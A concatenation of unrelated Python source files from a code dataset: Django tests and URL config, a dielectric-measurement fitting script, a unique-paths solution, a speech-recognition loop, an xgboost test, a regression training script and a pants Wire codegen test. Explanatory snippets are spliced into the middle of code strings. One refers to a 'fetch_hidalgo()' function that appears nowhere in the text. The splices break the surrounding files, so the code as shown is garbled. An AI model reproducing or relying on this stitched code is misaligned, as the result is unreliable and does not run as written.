test_create_two_network_per_user(self):\n self.client.force_login(User.objects.create_user(username='foobar', password='password'))\n response_for_network1 = self.client.post(self.url, self.post_data_network1)\n response_for_network2 = self.client.post(self.url, self.post_data_network2)\n\n home_page = self.client.get(reverse('networkResources'))\n\n self.assertEqual(response_for_network1.status_code, 302)\n self.assertEqual(response_for_network2.status_code, 302)\n self.assertRedirects(response_for_network1, reverse('networkResources'))\n self.assertRedirects(response_for_network2, reverse('networkResources'))\n self.assertContains(home_page, 'Network010')\n self.assertContains(home_page, 
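A standalone sketch of the table scrape in fetch_hidalgo() above, run on an inline HTML snippet instead of the live Wikipedia page and without the Django model calls. One detail worth noting: BeautifulSoup(html) with no parser argument is parser-dependent and emits a warning; passing 'html.parser' pins the behavior.

from bs4 import BeautifulSoup

html = """
<table>
  <tr><th>#</th><th>Municipio</th><th>Cabecera</th></tr>
  <tr><td>1</td><td> Acatlán </td><td>Acatlán</td></tr>
  <tr><td>2</td><td> Acaxochitlán </td><td>Acaxochitlán</td></tr>
</table>
"""
soup = BeautifulSoup(html, 'html.parser')
tabla = soup.findAll('table')[0]
for linea in tabla.findAll('tr'):
    columnas = linea.findAll('td')       # the header row has <th>, so it is skipped
    if len(columnas) > 2:
        print(columnas[1].text.strip())  # Acatlán, Acaxochitlán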
'Network020')\n\n","repo_name":"cornyhorse-old-projects/Dashboard","sub_path":"dashboard/dashboard/compute/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20090061456","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 11 23:41:29 2021\n\"\"\"\n\nfrom PyOECP import Models\nfrom PyOECP import References\nfrom PyOECP import Transform\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport copy\n\n''' Example 3 Aqueous sodium chloride solution\nThe goals of this script is as follows.\n\n(1) We will see if the selection of reference liquids can have a significant impact on the accuracy.\n(2) We will check if the implemention of the EP correction algorithm is okay.\n\nFor goal (1), we will do the following things.\n(a) Convert the reflection coefficients in NaCl (aq) 0.18 M solution from a VNA. \n We will use (open, short, water, and acetone) in the first set.\n(b) Convert the reflection coefficients in NaCl (aq) 0.18 M solution from a VNA.\n We will use (open, short, water, and NaCl (aq) 0.09 M) in the second set.\n(c) Compare the results from (a) and (b).\n\nFor goal (2), we will do the following things.\n(a) Use NaCl (aq) 1.44 M as a reference liquid. Peyman model is used.\n(3) Subtract the specific conductance contribution and EP contribution from NaCl (aq) 0.18 M.\n\nThe data files and VNAs are as follows.\nShort: S11Short.csv\nOpen: S11Open.csv\nAcetone: S11Acetone.csv\nWater: S11Water.csv\nNaCl (aq) 0.09 M: S11NaClL1.csv\nNaCl (aq) 0.18 M: S11NaClL2.csv\nNaCl (aq) 1.44 M: S11NaClH.csv\n'''\n\nnp.random.seed(881346)\n\nT = 25\nepsilon0 = 8.8541878128e-12\n\n''' 3.1. Let's examine the influence of references. '''\naddress = 'data/'\nS11r0 = References.Parser(address + 'S11ShortL.csv')\nS11r1 = References.Parser(address + 'S11OpenL.csv')\nS11r21 = References.Parser(address + 'S11NaClL1.csv') \nS11r22 = References.Parser(address + 'S11WaterL.csv') \nS11r3 = References.Parser(address + 'S11AcetoneL.csv')\n\nS11m = References.Parser(address + 'S11NaClL2.csv')\n\nfrequency = S11r1[:,0]\n\nTransformModel = Transform.Marsland(frequency,S11m,S11r0,S11r1,S11r21,S11r3,\n m2='Open',m3='NaClAqueous_Peyman',m4='Acetone_Wei',temperature=T,\n Window=101,concentrations=[None,None,0.09,None])\nMarslandData1 = TransformModel.Calculate()\n\nTransformModel = Transform.Marsland(frequency,S11m,S11r0,S11r1,S11r22,S11r3,\n m2='Open',m3='Water_Kaatze',m4='Acetone_Wei',temperature=T,\n Window=101,concentrations=[None,None,None,None])\nMarslandData2 = TransformModel.Calculate()\n\n''' Check if the Komarov model yields the similar result. '''\nTransformModel = Transform.Komarov(frequency, S11m, S11r1, S11r3, S11r21,\n 'Open','Acetone_Wei','NaClAqueous_Peyman',\n 0.3,0.8,2.1+0*1j,M=50,Window=51,\n concentrations=[None,None,0.09])\n\nKomarovData1 = TransformModel.epsilon\n\nTransformModel = Transform.Komarov(frequency, S11m, S11r1, S11r3, S11r22,\n 'Open','Acetone_Wei','Water_Kaatze',\n 0.3,0.8,2.1+0*1j,M=50,Window=51,\n concentrations=[None,None,None])\n\nKomarovData2 = TransformModel.epsilon\n\n# Reference data generation.\nPeyman = References.NaClAqueous_Peyman(frequency,c=0.18)['epsilon']\n\n''' Let's visualize the data. 
'''\nfig, (ax1,ax2) = plt.subplots(2,1)\nfig.set_size_inches((5,8))\nfig.set_dpi(300)\nfont = {'size':15}\nplt.rc('font', **font)\nplt.rcParams['font.family'] = 'serif'\n\nspacing = 10\n\nax1.semilogx(frequency[::spacing],np.real(MarslandData1)[::spacing],'o',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (Marsland, NaCl ref.)\")\nax1.semilogx(frequency[::spacing],-np.imag(MarslandData1)[::spacing],'o',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (Marsland, NaCl ref.)\")\nax1.semilogx(frequency[::spacing],np.real(MarslandData2)[::spacing],'s',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (Marsland, Water ref.)\")\nax1.semilogx(frequency[::spacing],-np.imag(MarslandData2)[::spacing],'s',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (Marsland, Water ref.)\")\nax1.semilogx(frequency,np.real(Peyman),'r',linewidth=2,label=\"$\\epsilon'$ (Peyman, c=0.18 M)\")\n\nax1.semilogx(frequency[::spacing],np.real(KomarovData1)[::spacing],'>',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (Komarov, NaCl ref.)\")\nax1.semilogx(frequency[::spacing],-np.imag(KomarovData1)[::spacing],'>',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (Komarov, NaCl ref.)\")\nax1.semilogx(frequency[::spacing],np.real(KomarovData2)[::spacing],'p',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (Komarov, Water ref.)\")\nax1.semilogx(frequency[::spacing],-np.imag(KomarovData2)[::spacing],'p',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (Komarov, Water ref.)\")\nax1.semilogx(frequency,-np.imag(Peyman),'b',linewidth=2, label=\"$\\epsilon''$ (Peyman, c=0.18 M)\")\n\n#ax1.xlabel(\"frequency [Hz]\")\nax1.set_ylabel(\"$\\epsilon$\")\nax1.set_ylim([0,160])\nax1.legend(loc='upper right', ncol=2, fontsize=7,edgecolor='k')\nax1.text(-0.25,1,'(a)',transform=ax1.transAxes)\n#ax1.show()\n#plt.savefig('Figure6.pdf',dpi=300)\n\n\n''' 3.2. High-concentration NaCl (aq)\nLet's examine the influence of references. '''\naddress = 'data/'\nS11r0 = References.Parser(address + 'S11ShortH.csv')\nS11r1 = References.Parser(address + 'S11OpenH.csv')\nS11r2 = References.Parser(address + 'S11WaterH.csv') \nS11r3 = References.Parser(address + 'S11AcetoneH.csv')\n\nS11m = References.Parser(address + 'S11NaClH.csv')\n\nfrequency = S11r1[:,0]\n\nTransformModel = Transform.Komarov(frequency, S11m, S11r0, S11r1, S11r2, \n 'Short','Open','Water_Kaatze',\n 0.3,0.8,2.1+0*1j,M=50,Window=81,\n concentrations=[None,None,None],temperature=T)\n\nKomarovData = TransformModel.epsilon\n\nPeyman = References.NaClAqueous_Peyman(frequency,c=1.44,temperature=T)['epsilon']\n\n''' Let's visualize the data in terms of the permittivity. '''\n\nspacing = 8\n\npar = Models.Parameters()\n''''3.2.2. Initial estimation of the conductance.'''\nrelaxation = -np.imag(KomarovData)\nrelaxation = relaxation[frequency<5e8]\nfrequencyL = frequency[frequency<5e8]\n\nconductance = lambda x, a: x/(2*np.pi*a*epsilon0)\nfrom scipy.optimize import curve_fit\npopt = curve_fit(conductance,frequencyL,relaxation)\nconductance = popt[0]\n\n''' 3.2.3. Set the initial model parameters. We will use the Cole-Cole model. 
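Section 3.2.2 above estimates the ionic conductance from the low-frequency loss. The textbook relation is eps''(f) = kappa / (2*pi*f*eps0), i.e. conduction loss falls off as 1/f; the lambda in the script appears to place the frequency in the numerator and the fitted parameter in the denominator, which is the inverse of that form, and it binds the whole (params, covariance) tuple returned by curve_fit before indexing it. A self-contained sketch of the textbook fit on synthetic data, unpacking the return value explicitly:

import numpy as np
from scipy.optimize import curve_fit

eps0 = 8.8541878128e-12
f = np.logspace(7, 8.7, 50)                 # 10 MHz .. 0.5 GHz
kappa_true = 11.0                           # S/m, hypothetical value
loss = kappa_true / (2 * np.pi * f * eps0)  # synthetic conduction-dominated eps''

model = lambda x, kappa: kappa / (2 * np.pi * x * eps0)
popt, pcov = curve_fit(model, f, loss)      # curve_fit returns (params, covariance)
print(round(popt[0], 3))                    # ~11.0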
'''\npar.Set('ei',1.0)\npar.Set('conductance',conductance)\npar.Set('As',[0.6])\npar.Set('magnitudes',70.0)\npar.Set('times',1/(2*np.pi*2e10))\npar.Set('CPEs',[400,.9])\nlb = copy.deepcopy(par)\nub = copy.deepcopy(par)\npar = par.Parameters()\nlb.Set('conductance',par['conductance']*0.5)\nub.Set('conductance',par['conductance']*1.5)\nlb.Set('magnitudes',30.0)\nub.Set('magnitudes',90.0)\nlb.Set('times',1/(2*np.pi*1e10))\nub.Set('times',1/(2*np.pi*3e10))\nlb.Set('As',0.0)\nub.Set('As',1.0)\nlb.Set('CPEs',[0.0,0.0])\nub.Set('CPEs',[np.inf,1.0])\n\nproduction = 30000\n\nlb = lb.Parameters()\nub = ub.Parameters()\n\nNames = lb.keys()\nfor Name in Names:\n if lb[Name] is None:\n continue\n else:\n for ele in range(len(lb[Name])):\n lb[Name][ele] = 0.0\n ub[Name][ele] = np.inf\n\nTrial = Models.MCMC(frequency,KomarovData,par,production,\n lb=lb,ub=ub,control=None,burnin=None,Rate=0.05)\nchi2s, Chain, par2 = Trial.Run()\n\nFittedData = Models.Discrete(frequency,par2)\n\n''' 3.2.4. Compare the result by excluding the electrode polarization effect and conductance contribution. '''\npar3 = par2\npar3['CPEs'] = np.array([],ndmin=1)\npar3['conductance'] = np.array([],ndmin=1)\nData = Models.Discrete(frequency,par3)\n\nplt.figure(figsize=(5,4),dpi=300)\nplt.gcf().subplots_adjust(bottom=0.15,left=0.15)\n\nspacing1 = 8\nspacing2 = 10\n\nax2.semilogx(frequency[::spacing1],np.real(KomarovData)[::spacing1],'o',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (Komarov)\")\nax2.semilogx(frequency[::spacing1],-np.imag(KomarovData)[::spacing1],'o',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (Komarov)\")\n\nax2.semilogx(frequency[::spacing2],np.real(Data)[::spacing2],'s',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (EP & $\\kappa$ correction)\")\nax2.semilogx(frequency[::spacing2],-np.imag(Data)[::spacing2],'s',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (EP & $\\kappa$ correction)\")\n\nax2.semilogx(frequency,np.real(Peyman),'r',linewidth=2,label=\"$\\epsilon'$ (Peyman, c=1.44 M)\")\nax2.semilogx(frequency,-np.imag(Peyman),'b',linewidth=2, label=\"$\\epsilon''$ (Peyman, c=1.44 M)\")\n\nax2.set_xlabel(\"frequency [Hz]\")\nax2.set_ylabel(\"$\\epsilon$\")\nax2.set_ylim([0,300])\nax2.legend(loc='upper right', ncol=1, fontsize='xx-small',edgecolor='k')\nax2.text(-0.25,1,'(b)',transform=ax2.transAxes)\nfig.savefig('Figure6.pdf',format='pdf',dpi=300,bbox_inches='tight')","repo_name":"tyoon124/PyOECP","sub_path":"PyOECP/Examples/Example3-NaCl(aq)/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":9659,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"30739731193","text":"\"\"\"\nUnique Paths\n\nA robot is located at the top-left corner of a m*n grid(marked 'Start' in the diagram \nbelow.)\nThe robot can only move either down or right at any point in time. 
The robot is trying\nto reach the bottom-right corner of the grid(marked 'Finish' in the diagram below).\n\nHow many possible unique paths are there?\n\nExample 1:\n\n[ S | | | | | | |\n\n| | | | | | | |\n\n| | | | | | | F ]\n\nsol\n\n[ 28| 21|15 |10 | 6 | 3 | 1 |0\n\n| 7 | 6 | 5 | 4 | 3 | 2 | 1 |0\n\n| 1 | 1 | 1 | 1 | 1 | 1 | 1 ]0\n 0 0 0 0 0 0 0\n\nm =3, n=7\nOutput=28\n\"\"\"\nimport unittest\nclass Solution:\n\n # time complexity: O(n * m) | space complexity: O(n) coz it is the length of the row\n def unique_paths(self, m:int, n: int)-> int:\n row =[1] * n # bottom row (n is length of number of rows)\n\n for i in range(m-1): # go through all the other rows except for the last one\n newRow =[1] * n # new row is above the bottom(old) row\n # go through all columns except the rightmost column coz it is going to be 1\n # coz all last values in every single row are 1\n for j in range(n-2, -1, -1): \n newRow[j] = newRow[j + 1] + row[j] # row[j] is the value below in the old row\n row = newRow\n return row[0]\n \nclass TestUniquePaths(unittest.TestCase):\n\n def __init__(self, methodName: str = \"runTest\") -> None:\n super().__init__(methodName)\n self.sol = Solution()\n\n def test_unique_paths(self):\n self.assertEqual(28, self.sol.unique_paths(7, 3))\n\nif __name__==\"__main__\":\n unittest.main()","repo_name":"Chemokoren/Algorithms-1","sub_path":"neetcode/Dynamic Programming/unique_paths.py","file_name":"unique_paths.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"39966067888","text":"import speech_recognition as sr\n\ndef recon(reconhecedor,microfone):\n with microfone as somprincipal:\n reconhecedor.adjust_for_ambient_noise(somprincipal)\n audio = reconhecedor.listen(somprincipal)\n\n response = {\n \"sucesso\": True,\n \"erro\": None,\n \"transcricao\":None\n }\n\n try:\n response[\"transcricao\"] = reconhecedor.recognize_google(audio, language='pt-BR')\n \n except sr.RequestError:\n response[\"sucesso\"] = False\n response[\"erro\"] = \"API não disponivel\"\n \n except sr.UnknownValueError:\n response[\"erro\"] = \"Não entendi sua fala\"\n \n return response\n\nif __name__ == \"__main__\":\n reconhecedor = sr.Recognizer()\n microfone = sr.Microphone()\n\n NFALA = 10\n NSEMFALA = 10\n\n print('\\n### Programa funcionando ###')\n\n for i in range(NFALA):\n for j in range(NSEMFALA):\n print('\\n TESTE {} - Fale no microfone \\n'.format(i+1))\n\n somteste = recon(reconhecedor, microfone)\n\n if somteste[\"transcricao\"]:\n break\n if not somteste[\"sucesso\"]:\n break\n print(\"Eu não entendi. 
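Cross-check of the unique-paths DP above: the number of monotone lattice paths in an m x n grid is the binomial coefficient C(m+n-2, m-1), since every path is a shuffle of (m-1) "down" moves and (n-1) "right" moves. A compact in-place version of the same recurrence, verified against math.comb (Python 3.8+):

from math import comb

def unique_paths_dp(m, n):
    row = [1] * n
    for _ in range(m - 1):
        for j in range(n - 2, -1, -1):
            row[j] += row[j + 1]   # cell = cell below + right neighbor
    return row[0]

for m, n in [(3, 7), (3, 2), (7, 3), (1, 1)]:
    assert unique_paths_dp(m, n) == comb(m + n - 2, m - 1)
print(unique_paths_dp(3, 7))  # 28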
repita\\n\")\n\n if somteste[\"erro\"]:\n print(\"erro: {} \\n\".format(somteste[\"erro\"]))\n\n print(\"Voce disse: {}\".format(somteste[\"transcricao\"]))","repo_name":"Matthwhy/IA_de_transcricao_de_audio","sub_path":"voiceIA.py","file_name":"voiceIA.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35581082744","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\nfrom django.contrib.sitemaps.views import sitemap\nfrom .sitemap import StaticViewSitemap\nfrom main import views as main_views\n\n\nrobots = 'User-agent: *\\n' \\\n 'Disallow: /admin\\n' \\\n 'Sitemap: https://digitalrush.ru/sitemap.xml'\n\nsitemaps = {\n 'static': StaticViewSitemap,\n }\n\nmanifest = '{\"name\":\"DigitalRush\",' \\\n '\"short_name\":\"digitalrush\",' \\\n '\"start_url\":\"/\",' \\\n '\"display\":\"standalone\",' \\\n '\"theme_color\":\"#000\",' \\\n '\"background_color\":\"#000\",' \\\n '\"description\":\"digital-агентство по разработке и продвижению сайтов\",' \\\n '\"serviceworker\":{\"src\": \"/sw.js\"},' \\\n '\"icons\":' \\\n '[{\"src\":\"static/img/favicon-16x16.png\",' \\\n '\"sizes\":\"16x16\",' \\\n '\"type\":\"image/png\"},' \\\n '{\"src\":\"static/img/favicon-32x32.png\",' \\\n '\"sizes\":\"32x32\",' \\\n '\"type\":\"image/png\"},' \\\n '{\"src\":\"static/img/favicon-196x196.png\",' \\\n '\"sizes\":\"196x196\",' \\\n '\"type\":\"image/png\"},' \\\n '{\"src\":\"static/img/favicon-512x512.png\",' \\\n '\"sizes\":\"512x512\",' \\\n '\"type\":\"image/png\"}]}'\n\nadmin.autodiscover()\n\nurlpatterns = [\n path('grappelli/', include('grappelli.urls')),\n path('admin/', admin.site.urls),\n path('', include('main.urls')),\n path('robots.txt', lambda r: HttpResponse(robots, content_type=\"text/plain\")),\n path('sitemap.xml', sitemap, {'sitemaps': sitemaps}, name='django.contrib.sitemaps.views.sitemap'),\n path('manifest.json', lambda r: HttpResponse(manifest, content_type=\"application/json\")),\n path('sw.js', (TemplateView.as_view(template_name=\"sw.js\", content_type='application/javascript', )), name='sw.js'),\n]\n\nhandler404 = main_views.error_404\nhandler500 = main_views.error_500\n","repo_name":"EclipseAltair/digitalrush","sub_path":"digitalrush/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"20378424010","text":"import pytest\nimport sys\nimport numpy as np\n\ntry:\n import xgboost\n from xgboost import XGBClassifier\nexcept ImportError:\n pass\nfrom sklearn.datasets import load_iris\n\nfrom pure_sklearn.map import convert_estimator\n\nMETHODS = [\"predict\", \"predict_proba\"]\n\n\n@pytest.mark.skipif(\"xgboost\" not in sys.modules, reason=\"requires xgboost\")\ndef test_xgboost():\n X, y = load_iris(return_X_y=True)\n X_ = X.tolist()\n for y_ in [y, (y == 0).astype(int), (y == 2).astype(int)]:\n for n_estimators in [2, 10]:\n for max_depth in [3, 10]:\n clf = XGBClassifier(\n booster=\"gbtree\",\n random_state=5,\n n_estimators=n_estimators,\n max_depth=max_depth,\n )\n clf.fit(X, y_)\n clf_ = convert_estimator(clf)\n for method in METHODS:\n scores = getattr(clf, method)(X)\n scores_ = getattr(clf_, method)(X_)\n assert np.allclose(scores, scores_, 
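The recognition loop in voiceIA above retries recon() until a transcription arrives or the API errors out; its user-facing strings are Portuguese ("Fale no microfone" = "speak into the microphone", "Eu não entendi, repita" = "I did not understand, repeat"). A control-flow sketch of one utterance that runs without a microphone: recon_stub is a stand-in for recon(), returning the same {'sucesso', 'erro', 'transcricao'} dict shape.

def recon_stub(attempt, succeed_on=3):
    ok = attempt >= succeed_on
    return {"sucesso": True,
            "erro": None if ok else "Could not understand speech",
            "transcricao": "hello world" if ok else None}

for attempt in range(1, 11):                 # retry budget of 10
    response = recon_stub(attempt)
    if not response["sucesso"]:
        break                                # API unavailable: give up
    if response["transcricao"]:
        print("You said:", response["transcricao"])
        break
    print("Did not catch that, please repeat")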
equal_nan=True)\n","repo_name":"Ibotta/pure-predict","sub_path":"pure_sklearn/xgboost/tests/test_xgboost.py","file_name":"test_xgboost.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"38"} +{"seq_id":"24977904437","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport pickle\n\n\n##Reading the csv file\ndf = pd.read_csv('ai4i2020.csv')\n\ndf.head() # Checking the first five rows of dataset.\ndf.info() # printing the summary of dataset\ndf.isnull().sum() #Checking the missing value in dataset\n\n# df = df.fillna(method='mean') # Filling null value with mean value\n\n#Droping the column which is not going to use for feature prediction\n\ndf.drop(['Product ID','UDI'],axis=1,inplace=True)\n\n# Convert categorial features into numerical\ndf = pd.get_dummies(df,columns=['Type'],drop_first=True)\n\n\n#Assign new index to database last index as prediction result\n\nnew_column = ['Air temperature [K]','Process temperature [K]','Rotational speed [rpm]','Torque [Nm]',\n 'Tool wear [min]','TWF','HDF','PWF','OSF','RNF','Machine failure']\n\ndf = df.reindex(columns=new_column)\n\n# Convert all the data into standscaler\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\nx = df.iloc[:,0:-1]\ny = df.iloc[:,-1]\n\n\narr = scaler.fit_transform(x)\n\n# check multi-corelation with each features\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\nvia_df = pd.DataFrame()\nvia_df['vif'] = [variance_inflation_factor(arr,i) for i in range(arr.shape[1])]\nvia_df['feature'] = x.columns\n\n\n# convert dataset into train and test\nfrom sklearn.model_selection import train_test_split\nx_train,x_test,y_train,y_test = train_test_split(arr,y,test_size=0.33,random_state=0)\n\n# Train dataset on linearmodel\n\nfrom sklearn.linear_model import LinearRegression\nlinear = LinearRegression()\nlinear.fit(x_train,y_train)\n\n# check score before add new data\nfrom sklearn.metrics import r2_score\nscore = r2_score(linear.predict(x_test),y_test)\nprint(score)\n\n# Saving the model into the local file system\nfilename = 'finalized_model_for_car.pickle'\npickle.dump(linear,open(filename,'wb'))\n\n# #Prediction using save model\nloaded_model = pickle.load(open(filename,'rb'))\n\n\n\n\n","repo_name":"hgoswami007/checkMachineFailure","sub_path":"trainModel.py","file_name":"trainModel.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33399810324","text":"from __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport os\nfrom textwrap import dedent\n\nfrom twitter.common.collections import OrderedSet\n\nfrom pants.backend.codegen.register import build_file_aliases as register_codegen\nfrom pants.backend.codegen.targets.java_wire_library import JavaWireLibrary\nfrom pants.backend.codegen.tasks.wire_gen import WireGen\nfrom pants.backend.core.register import build_file_aliases as register_core\nfrom pants.backend.jvm.targets.jar_dependency import JarDependency\nfrom pants.backend.jvm.targets.jar_library import JarLibrary\nfrom pants.base.exceptions import TaskError\nfrom pants.base.revision import Revision\nfrom pants.base.source_root import SourceRoot\nfrom pants.base.target import Target\nfrom pants.base.validation import assert_list\nfrom pants.util.contextutil import temporary_file\nfrom 
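Two details in the trainModel.py script above, shown here in corrected form on synthetic data (this is a sketch, not the script itself). First, sklearn's signature is r2_score(y_true, y_pred) and R^2 is not symmetric in its arguments, while the script passes the predictions first. Second, the StandardScaler is fit on the full dataset before train_test_split, which leaks test-set statistics into training; fitting on the training fold alone avoids that.

import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 3))
y = X @ np.array([1.5, -2.0, 0.5]) + rng.normal(scale=0.1, size=200)

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=0)
scaler = StandardScaler().fit(X_train)           # fit on the training fold only
model = LinearRegression().fit(scaler.transform(X_train), y_train)
pred = model.predict(scaler.transform(X_test))
print(round(r2_score(y_test, pred), 4))          # y_true first, then y_pred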
pants_test.tasks.task_test_base import TaskTestBase\n\n\nclass WireGenTest(TaskTestBase):\n\n EXPECTED_TASK_PATH = \".pants.d/pants_backend_codegen_tasks_wire_gen_WireGen/isolated\"\n\n @classmethod\n def task_type(cls):\n return WireGen\n\n @property\n def alias_groups(self):\n return register_core().merge(register_codegen())\n\n def assert_files(self, task, rel_path, contents, service_writer, expected_files):\n assert_list(expected_files)\n\n with temporary_file() as fp:\n fp.write(contents)\n fp.close()\n self.assertEqual(set(expected_files),\n task.calculate_genfiles(fp.name, rel_path, service_writer))\n\n def assert_java_files(self, task, rel_path, contents, service_writer, expected_files):\n self.assert_files(task, rel_path, contents, service_writer, expected_files)\n\n def test_plain(self):\n task = self.create_task(self.context())\n self.assert_java_files(\n task,\n 'temperatures.proto',\n '''\n package org.pantsbuild.example.temperature;\n\n /**\n * Structure for expressing temperature: 75 Fahrenheit, 12 Celsius, etc.\n * Not so useful on its own.\n */\n message Temperature {\n optional string unit = 1;\n required int64 number = 2;\n }\n ''',\n None,\n ['org/pantsbuild/example/temperature/Temperature.java'])\n\n self.assert_java_files(\n task,\n 'temperatures.proto',\n 'package org.pantsbuild.example.temperature',\n None,\n [])\n\n def test_custom_package(self):\n task = self.create_task(self.context())\n self.assert_java_files(\n task,\n 'freds.proto',\n '''\n package com.twitter.ads.revenue_tables;\n option java_package = \"com.example.foo.bar\";\n\n message Fred {\n optional string name = 1;\n }\n ''',\n None,\n ['com/example/foo/bar/Fred.java'])\n\n self.assert_java_files(\n task,\n 'bam_bam.proto',\n 'option java_package = \"com.example.baz.bip\";',\n None,\n [])\n\n self.assert_java_files(\n task,\n 'bam_bam.proto',\n '''\n option java_package=\"com.example.baz.bip\" ;\n\n message BamBam {\n optional string name = 1;\n }\n ''',\n None,\n ['com/example/baz/bip/BamBam.java'])\n\n self.assert_java_files(\n task,\n 'fred.proto',\n '''\n option java_package = \"com.example.foo.bar\";\n package com.twitter.ads.revenue_tables;\n\n ''',\n None,\n [])\n\n def test_service_writer(self):\n task = self.create_task(self.context())\n self.assert_java_files(\n task,\n 'pants.proto',\n '''\n package pants.preferences;\n option java_multiple_files = true;\n option java_package = \"org.pantsbuild.protos.preferences\";\n service SomeService {\n rpc SomeRpc();\n rpc AnotherRpc() {\n }\n rpc AndAnother() {}\n }\n ''',\n 'com.squareup.wire.SimpleServiceWriter',\n ['org/pantsbuild/protos/preferences/SomeService.java'])\n\n def test_calculate_sources(self):\n self.add_to_build_file('wire-lib', dedent('''\n java_wire_library(name='wire-target',\n sources=['foo.proto'],\n )\n '''))\n target = self.target('wire-lib:wire-target')\n context = self.context(target_roots=[target])\n task = self.create_task(context)\n result = task._calculate_sources([target])\n self.assertEquals(1, len(result.keys()))\n self.assertEquals(OrderedSet(['wire-lib/foo.proto']), result['wire-lib'])\n\n def test_calculate_sources_with_source_root(self):\n SourceRoot.register('project/src/main/wire')\n self.add_to_build_file('project/src/main/wire/wire-lib', dedent('''\n java_wire_library(name='wire-target',\n sources=['foo.proto'],\n )\n '''))\n target = self.target('project/src/main/wire/wire-lib:wire-target')\n context = self.context(target_roots=[target])\n task = self.create_task(context)\n result = 
task._calculate_sources([target])\n self.assertEquals(1, len(result.keys()))\n self.assertEquals(OrderedSet(['project/src/main/wire/wire-lib/foo.proto']), result['project/src/main/wire'])\n\n def test_sources_generated_by_target(self):\n root_path = os.path.join('project', 'src', 'main', 'wire')\n wire_path = os.path.join(root_path, 'wire-lib')\n file_path = os.path.join(wire_path, 'org', 'pantsbuild', 'example', 'foo.proto')\n SourceRoot.register(root_path)\n self.add_to_build_file(wire_path, dedent('''\n java_wire_library(name='wire-target',\n sources=['{0}'],\n )\n '''.format(os.path.relpath(file_path, wire_path))))\n self.create_dir(os.path.dirname(file_path))\n self.create_file(file_path, dedent('''\n package org.pantsbuild.example;\n\n message Foo {\n optional string bar = 1;\n optional string foobar = 2;\n }\n '''))\n target = self.target('project/src/main/wire/wire-lib:wire-target')\n context = self.context(target_roots=[target])\n task = self.create_task(context)\n previous_working_directory = os.path.abspath('.')\n os.chdir(os.path.abspath(self.build_root))\n result = task.sources_generated_by_target(target)\n os.chdir(previous_working_directory)\n self.assertEquals(OrderedSet(['org/pantsbuild/example/Foo.java']), OrderedSet(result))\n\n def _create_fake_wire_tool(self, version='1.6.0'):\n self.make_target(':wire-compiler', JarLibrary, jars=[\n JarDependency(org='com.squareup.wire', name='wire-compiler', rev=version),\n ])\n\n def test_compiler_args(self):\n self._create_fake_wire_tool()\n SourceRoot.register('wire-src')\n simple_wire_target = self.make_target('wire-src:simple-wire-target', JavaWireLibrary,\n sources=['foo.proto'])\n context = self.context(target_roots=[simple_wire_target])\n task = self.create_task(context)\n self.assertEquals([\n '--java_out={}/{}/wire-src.simple-wire-target'.format(self.build_root,\n self.EXPECTED_TASK_PATH),\n '--proto_path={}/wire-src'.format(self.build_root),\n 'foo.proto'],\n task.format_args_for_target(simple_wire_target))\n\n def test_compiler_args_wirev1(self):\n self._create_fake_wire_tool()\n SourceRoot.register('wire-src')\n wire_targetv1 = self.make_target('wire-src:wire-targetv1', JavaWireLibrary,\n sources=['bar.proto'],\n service_writer='org.pantsbuild.DummyServiceWriter',\n service_writer_options=['opt1', 'opt2'])\n task = self.create_task(self.context(target_roots=[wire_targetv1]))\n self.assertEquals([\n '--java_out={}/{}/wire-src.wire-targetv1'.format(self.build_root, self.EXPECTED_TASK_PATH),\n 